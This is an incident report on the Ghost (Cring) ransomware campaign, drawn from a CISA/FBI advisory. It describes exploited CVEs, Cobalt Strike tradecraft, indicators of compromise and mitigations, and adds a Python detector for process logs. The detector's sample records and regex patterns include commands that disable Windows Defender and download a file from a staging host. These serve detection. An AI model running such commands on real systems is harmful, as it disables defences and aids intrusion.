Full Report
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the Federal Bureau of Investigation (FBI) and... (Source: "CISA, FBI, MS-ISAC warn of Ghost ransomware exploiting outdated systems across critical infrastructure", Industrial Cyber.)
Analysis Summary
# Incident Report: Ghost (Cring) Ransomware Campaign Exploiting Unpatched Public-Facing Services
## Executive Summary
This report summarizes joint advisories concerning the "Ghost" ransomware group (also known as Cring, Crypt3r, and other names), active since early 2021 and conducting widespread, financially motivated attacks worldwide. The primary vector was exploitation of known vulnerabilities (CVEs) in unpatched, internet-facing software and firmware. The campaign gained access to organizations in the critical infrastructure, education, healthcare, and government sectors, relied primarily on Cobalt Strike for command and control, and deployed ransomware rapidly, often within hours of initial compromise.
## Incident Details
- **Discovery Date:** Early 2021 (Start of activity noted in advisory)
- **Incident Date:** Ongoing, observed since early 2021
- **Affected Organization:** Organizations across more than 70 countries, including critical infrastructure, schools/universities, healthcare, government, religious institutions, technology, and manufacturing companies.
- **Sector:** Broad scope including Critical Infrastructure, Education, Healthcare, Government, Technology, Manufacturing.
- **Geography:** Global, with actors located in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Beginning early 2021. Rapid compromise observed, with ransomware deployed within the same day as initial compromise in multiple instances.
- **Vector:** Exploitation of unpatched, internet-facing software and firmware (CVEs).
- **Details:** Attackers leveraged publicly available code to exploit unpatched CVEs on exposed servers. Specific vulnerabilities targeted include those related to Fortinet FortiOS (CVE-2018-13379), Adobe ColdFusion, Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (ProxyShell chain: CVE-2021-34473, etc.).
### Lateral Movement
- **Details:** After initial access, a web shell was uploaded. Attackers then used Windows Command Prompt/PowerShell to download and execute Cobalt Strike Beacon. Limited lateral movement observed, as the actors typically spent only a few days on victim networks before executing the final payload.
### Data Exfiltration/Impact
- **Details:** Primary impact was system encryption via ransomware (using executables like Cring.exe, Ghost.exe). Ransom notes threatened data sale, but CISA/FBI observed *limited* exfiltration of substantial data (like IP or PII). Data staging sometimes utilized Mega[dot]nz or web shells.
### Detection & Response
- **Details:** Detection relies on monitoring for Cobalt Strike Beacon activity and web shells, and on applying the IOCs/TTPs shared in CISA advisories. Response actions focus on mitigations drawn from the Cross-Sector Cybersecurity Performance Goals (CPGs).
## Attack Methodology
- **Initial Access:** Exploitation of public-facing application vulnerabilities (CVE exploitation) on outdated software/firmware.
- **Persistence:** Not a major focus; actors typically spend only a few days. Sporadically created new local/domain accounts or changed existing passwords. In 2024, observed deploying web shells.
- **Privilege Escalation:** Used built-in Cobalt Strike functions ('hashdump') or open-source tools such as 'SharpZeroLogon', 'SharpGPPPass', 'BadPotato', and 'GodPotato', often leveraging stolen process tokens.
- **Defense Evasion:** Used Cobalt Strike functions to list running processes and frequently ran commands to **disable Windows Defender**.
- **Credential Access:** Used Cobalt Strike function 'hashdump' or Mimikatz to collect passwords and/or password hashes.
- **Discovery:** Used Cobalt Strike to review running processes to identify existing security controls (AV).
- **Lateral Movement:** Limited, but included pivoting using stolen credentials/hashes.
- **Collection:** Limited downloading of data to Cobalt Strike Team Servers; staging via Mega[dot]nz noted in minimal instances.
- **Exfiltration:** Limited in scope; focused more on disruption than data theft.
- **Impact:** Ransomware encryption (variable file extensions and ransom note text).
## Impact Assessment
- **Financial:** Not explicitly quantified, but implied due to ransomware execution across numerous sectors.
- **Data Breach:** Limited PII or IP exfiltration reported, though ransom notes threatened sale of exfiltrated data.
- **Operational:** Significant operational disruption due to rapid ransomware deployment.
- **Reputational:** Affected all organization types, including critical infrastructure and government agencies.
## Indicators of Compromise
- **Network indicators:** Reliance on Cobalt Strike C2 using HTTP/HTTPS protocols.
- **File indicators:** Ransomware executables such as Cring[dot]exe, Ghost[dot]exe, ElysiumO[dot]exe, and Locker[dot]exe.
- **Behavioral indicators:** Deployment of web shells, disabling of Windows Defender, use of specific publicly available exploitation modules (e.g., for ProxyShell).
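The Detection & Response and Indicators of Compromise sections above describe three things a defender can look for: a web shell being used to launch a shell, commands that disable Windows Defender, and the named ransomware executables. The following is an added example, not code from the advisory or from Industrial Cyber, showing how those behaviours can be flagged in process-creation telemetry. It runs over a handful of constructed Sysmon-style records embedded in the block; the record format, the host names, the assumption that a web shell shows up as the IIS worker process `w3wp.exe` spawning `cmd.exe`/`powershell.exe`, and the Defender-disabling command patterns are all assumptions of the example, not details from the report. The executable names and the staging host are taken from the report's defanged IoCs and refanged before matching.

```python
"""Flag Ghost/Cring-style post-exploitation behaviour in process-creation logs.

Added example (not from the CISA/FBI advisory or the Industrial Cyber post).
Input records are a constructed key="value" format approximating Sysmon
Event ID 1 fields: host, parent image, image, command line.
"""
import re
from dataclasses import dataclass

# Defanged IoCs exactly as the report lists them; refanged before matching.
DEFANGED_EXECUTABLES = ["Cring[dot]exe", "Ghost[dot]exe", "ElysiumO[dot]exe", "Locker[dot]exe"]
DEFANGED_STAGING_HOSTS = ["Mega[dot]nz"]


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('Cring[dot]exe', 'Mega[.]nz', 'hxxp://') back into a matchable string."""
    refanged = re.sub(r"\[\.\]|\[dot\]", ".", ioc, flags=re.IGNORECASE)
    return refanged.replace("hxxp", "http")


RANSOMWARE_EXECUTABLES = {refang(x).lower() for x in DEFANGED_EXECUTABLES}
STAGING_HOSTS = [refang(h).lower() for h in DEFANGED_STAGING_HOSTS]

# Assumption: a web shell on IIS surfaces as the worker process spawning a shell.
WEB_SERVER_PROCESSES = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Assumed patterns for "disable Windows Defender" activity (not taken from the report).
DEFENDER_DISABLE_PATTERNS = [
    re.compile(r"Set-MpPreference\s+.*-Disable\w+\s+\$?true", re.IGNORECASE),
    re.compile(r"\bsc(\.exe)?\s+(stop|config)\s+windefend\b", re.IGNORECASE),
    re.compile(r"DisableAntiSpyware", re.IGNORECASE),
]


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Last path component of a Windows path, e.g. 'C:\\Windows\\cmd.exe' -> 'cmd.exe'."""
    return path.rsplit("\\", 1)[-1]


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed key="value" record into a ProcessEvent."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcessEvent(fields["host"], fields["parent"], fields["image"], fields["cmd"])


def classify(event: ProcessEvent) -> list:
    """Return the list of behaviours this event matches (empty if benign)."""
    findings = []
    image = basename(event.image).lower()
    parent = basename(event.parent_image).lower()
    cmd = event.command_line.lower()
    if parent in WEB_SERVER_PROCESSES and image in SHELLS:
        findings.append("webshell_spawned_shell")
    if any(p.search(event.command_line) for p in DEFENDER_DISABLE_PATTERNS):
        findings.append("defender_disable")
    if image in RANSOMWARE_EXECUTABLES:
        findings.append("known_ransomware_executable")
    if any(host in cmd for host in STAGING_HOSTS):
        findings.append("staging_host_reference")
    return findings


def scan(lines) -> list:
    """Scan records and return (host, image basename, findings) for every event that matched."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        hits = classify(event)
        if hits:
            alerts.append((event.host, basename(event.image), hits))
    return alerts


# Constructed sample telemetry: two benign events and four suspicious ones.
SAMPLE_LOG = [
    r'host="web01" parent="C:\Windows\System32\services.exe" image="C:\Windows\System32\svchost.exe" cmd="svchost.exe -k netsvcs"',
    r'host="web01" parent="C:\Windows\System32\inetsrv\w3wp.exe" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c whoami"',
    r'host="web01" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -NoProfile -Command Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'host="fs02" parent="C:\Windows\System32\cmd.exe" image="C:\Users\Public\Ghost.exe" cmd="Ghost.exe"',
    r'host="fs02" parent="C:\Windows\explorer.exe" image="C:\Program Files\Notepad++\notepad++.exe" cmd="notepad++.exe report.txt"',
    r'host="fs02" parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -Command Invoke-WebRequest -Uri https://mega.nz/file/EXAMPLE -OutFile C:\Users\Public\stage.zip"',
]

if __name__ == "__main__":
    for host, image, hits in scan(SAMPLE_LOG):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

Each finding on its own is a weak signal (administrators do occasionally toggle Defender settings), but the report's pattern of web shell, then Defender disabled, then a known encryptor launched on the same host within a short window is what an analyst should correlate on; `scan` keeps the host in each alert so that grouping by host and time is straightforward in whatever SIEM the records come from.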
## Response Actions
Response actions are based on official recommendations aligned with CISA/NIST Cross-Sector Cybersecurity Performance Goals (CPGs).
- **Containment measures:** Immediate segmentation of infected devices; identification and isolation of compromised C2 channels.
- **Eradication steps:** Complete removal of web shells, Cobalt Strike Beacon implants, and any unauthorized accounts.
- **Recovery actions:** Restoration from known-good, segmented backups; comprehensive patching of all exploited and associated systems.
## Lessons Learned
- **Key takeaways:** Unpatched, internet-facing software/firmware remains a primary and successful entry point for ransomware operations (responsible for about one-third of successful compromises). The speed of execution (same-day impact) mandates extremely fast remediation cycles.
- **What could have been done better:** Organizations frequently fail to maintain perfect patching hygiene, enabling opportunistic exploitation by groups like Ghost/Cring.
## Recommendations
- **Prevention measures for similar incidents:**
1. **Prioritize Patching:** Dedicate significant resources to timely patching of operating systems, software, and firmware for internet-facing services.
2. **System Backups:** Maintain regular, segmented, and offline backups known to be recoverable.
3. **Network Segmentation:** Implement strict segmentation to prevent internal device pivoting after initial compromise.
4. **MFA Enforcement:** Require phishing-resistant Multi-Factor Authentication (MFA) for all privileged and email service accounts.
5. **Application Control:** Implement application allowlisting for scripts, applications, and network traffic to block unauthorized execution of malware like Cobalt Strike.
6. **Security Monitoring:** Enhance monitoring to identify and alert on abnormal network activity, PowerShell misuse, and specific defense evasion commands (e.g., AV disabling).
7. **Email Security:** Harden email gateways using DMARC, DKIM, and SPF.